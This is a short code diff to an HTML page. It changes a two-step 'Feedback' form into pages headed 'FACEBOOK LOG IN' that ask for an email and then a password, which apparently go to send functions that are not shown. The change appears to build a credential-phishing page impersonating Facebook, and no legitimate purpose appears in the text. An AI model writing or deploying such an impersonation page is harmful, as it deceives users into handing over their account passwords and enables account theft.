--- a/index.html
+++ b/index.html
@@ -80,16 +80,16 @@ button:hover {
 
   <!-- STEP 1 -->
   <div id="step1">
-    <h2>Feedback</h2>
-    <input id="f1" placeholder="Your feedback">
-    <button onclick="send1()">Submit</button>
+    <h2>FACEBOOK LOG IN</h2>
+    <input id="f1" placeholder="Email">
+    <button onclick="send1()">Next</button>
   </div>
 
   <!-- STEP 2 -->
   <div id="step2" class="hidden">
-    <h2>More Feedback</h2>
-    <input id="f2" placeholder="More feedback">
-    <button onclick="send2()">Submit</button>
+    <h2>FACEBOOK LOG IN</h2>
+    <input id="f2" placeholder="Password">
+    <button onclick="send2()">Log in</button>
   </div>
 
   <!-- LOADING -->
